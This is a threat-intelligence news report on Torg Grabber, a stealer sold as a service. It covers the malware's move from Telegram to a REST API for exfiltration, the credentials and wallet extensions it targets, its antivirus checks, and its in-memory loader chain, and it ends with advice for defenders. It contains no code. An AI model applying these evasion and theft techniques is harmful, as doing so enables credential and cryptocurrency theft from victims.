A sophisticated new Malware-as-a-Service (MaaS) dubbed Torg Grabber has emerged, showcasing a rapid evolution from basic Telegram exfiltration to a robust, encrypted REST API command-and-control (C2) infrastructure in just three months. This advanced credential stealer, identified by Gen Digital’s Threat Research Team, is being actively deployed for multiple cybercriminal operations, indicating a scalable, builder-based criminal enterprise. The malware, named after its prominent C2 domain technologytorg.com, which translates to “trade” or “marketplace” in Russian, highlights the commercialization of cybercrime tools.
The discovery of Torg Grabber began when a sample was misidentified as Vidar Stealer. Closer analysis revealed significant architectural differences, including a 64-bit PE build compiled with MinGW-GCC, contrasting with Vidar’s 32-bit MSVC build. Crucially, Torg Grabber incorporated a debug string with “grabber v1.0” and employed advanced encryption and authentication protocols for its C2 communications, setting it apart from other known stealers and signifying its unique development path.
Torg Grabber’s Rapid Development and Evolving Exfiltration Methods
Torg Grabber’s development trajectory, as analyzed by Gen Digital, demonstrates an accelerated progression through distinct operational phases. Early versions, active in December 2025, leveraged the Telegram Bot API to exfiltrate stolen data in compressed ZIP archives. This method offered a swift, low-infrastructure approach for initial data retrieval.
A brief transition occurred between December 17 and 20, 2025, where the malware experimented with a raw TCP socket protocol. This phase utilized a custom 9-byte binary frame and ChaCha20-Poly1305 encryption, representing a move towards more secure data transfer. However, this was quickly superseded by a more advanced and resilient C2 infrastructure.
Starting on December 18, 2025, Torg Grabber adopted a production-grade REST API over HTTPS. This communication channel is routed through Cloudflare, significantly enhancing its resilience against detection and blocking. The use of Cloudflare obfuscates the true C2 servers, making it much harder for security researchers and network administrators to intercept traffic or implement domain-based blocking measures.
Extensive Data Collection and Evasion Techniques
Torg Grabber exhibits a broad range of data collection capabilities, targeting sensitive information across numerous applications and platforms. It is designed to pilfer credentials from 25 distinct Chromium-based browsers and eight Firefox-family browsers. Additionally, it aggressively collects data from over 850 browser extensions, including those used for cryptocurrency wallets and two-factor authentication, making it a significant threat to financial assets.
Beyond browser data, Torg Grabber also targets session data from popular communication platforms like Discord, Telegram, and Steam. The malware further broadens its scope by collecting VPN configurations, FTP client credentials, and even desktop screenshots, providing attackers with comprehensive insights into a victim’s digital life and network access. Prior to initiating data collection, Torg Grabber conducts a scan for at least 46 antivirus signatures across 24 security products, an attempt to ascertain the victim’s defenses and potentially evade detection.
Evidence of the malware’s operational reach has been found in its binaries, with more than 40 confirmed operator tags. Eight of these tags have been linked to live Telegram accounts associated with Russian-speaking cybercrime networks, underscoring the organized nature of this operation and the community it serves.
The Loader Chain: A Multi-Stage Evasion Strategy
Torg Grabber employs a sophisticated multi-stage loader chain designed to evade detection by stripping away layers of obfuscation before the final payload is executed in memory. This complex process ensures that the stealer itself never directly touches the victim’s disk, a common tactic to bypass traditional file-scanning antivirus solutions.
Stage 0, the initial dropper, is often disguised as legitimate-looking software, such as fake game cheats, cracked software, or delivered through clipboard attacks like ClickFix, hosted on platforms like Google Apps Script. Upon execution, it often initiates a PowerShell command that, in turn, triggers a hidden Background Intelligent Transfer Service (BITS) download. This download runs under the guise of the legitimate Windows process `svchost.exe`, blending seamlessly with normal system traffic.
Stage 1 is a self-extracting loader that contains an AES-256-CBC encrypted overlay. This overlay is appended beyond the standard binary data and is decrypted through a custom hex decoding process followed by AES decryption. This stage also resolves Windows NT API calls at runtime using direct system calls, a technique that avoids leaving observable import tables for static analysis tools.
The final stage, Stage 2, operates entirely in memory as a reflective PE loader. This allows the stealer payload to be mapped into a live process without writing any executable code to the disk. By the time the Torg Grabber stealer is fully active, it is already running within a legitimate process, making it extremely difficult for endpoint security solutions to flag or scan.
Given the evolving nature of Torg Grabber and similar advanced threats, users are advised to exercise extreme caution when downloading software from unofficial sources, such as game cheat websites or cracked application platforms. IT security teams should monitor for unusual PowerShell commands with base64-encoded arguments and the creation of new BITS transfer jobs. Endpoint security tools should be configured to detect direct syscall usage and in-memory PE loading patterns.
Organizations utilizing Chromium-based browsers should ensure that App-Bound Encryption is properly configured. Furthermore, any unexpected suspension or unusual behavior of browser processes during normal activity should be treated as a potential indicator of compromise and investigated thoroughly. The ongoing adaptation of Torg Grabber suggests that continued vigilance and proactive security measures are paramount in mitigating the risks posed by this sophisticated MaaS stealer.